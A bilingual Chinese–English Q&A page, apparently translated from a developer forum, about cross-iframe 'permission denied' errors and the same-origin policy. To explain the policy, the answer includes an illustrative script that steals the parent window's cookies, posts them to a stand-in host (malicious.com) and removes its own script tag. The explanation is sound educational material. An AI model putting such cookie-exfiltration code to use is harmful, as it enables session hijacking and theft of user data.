javascript权限被拒绝访问属性 [英] javascript permission denied to access property

问题描述

我在从其他iframe访问属性时遇到问题。我一直拒绝这个权限访问属性错误。我见过人们问他们是否多次使用file：///但是没有人（除了我）所以永远不会被解决。

I am having an issue accessing properties from a different iframe. I keep getting this permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.

我不是在做这是在网上。我所有帧的src都在我硬盘上的同一个文件中。我试图从我在其他框架中创建的对象中获取一些属性

I am not doing this on the web. the src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in other frame

function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}

推荐答案

以下代码

<iframe src="http://example.com" onload="test(this)"></iframe>
<script>
function test(frame)
{
    var cDoc = frame.contentDocument;
}
</script>

抛出

Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.

协议必须匹配（例如：主窗口和iframe协议必须 file：或 http：来命名一对。）

The protocols must match (eg: the main window and the iframe protocols must be either file: or http: to name a couple).

域名必须匹配（例如：主窗口和iframe域必须 example.com ）

The domains must match (eg: the main window and the iframe domains must be example.com)

端口必须匹配（例如：主窗口和iframe端口必须 80 或 8080 ）

The ports must match (eg: the main window and the iframe ports must be 80 or 8080)

这是为了保护用户免受恶意网站执行的代码，如果这些边界没有到位，可以轻易地从毫无戒心的用户窃取数据。

This is to protect users from code being executed from malicious sites, which, had these boundaries not been put in place, could easily steal data from an unsuspecting user.

恶意JavaScript代码示例：

An example of malicious JavaScript code:

<script id="loadScript">
window.onload = function()
{
    //grab parent to iframe
    var parentWindow = window.parent.window;
    //grab cookies from parent window
    var cookies = parentWindow.document.cookie;
    //send cookies off to malicious site
    var form = document.createElement("form");
    var inp = document.createElement("input");
    form.action="http://malicious.com/maliciousAd.php";
    form.method="post";
    inp.value=cookies;
    inp.name="cookies";
    form.appendChild(inp);
    form.submit();
    //remove traces of malicious code
    document.body.removeChild(document.getElementById("loadScript"))
}
</script>

这篇关于javascript权限被拒绝访问属性的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！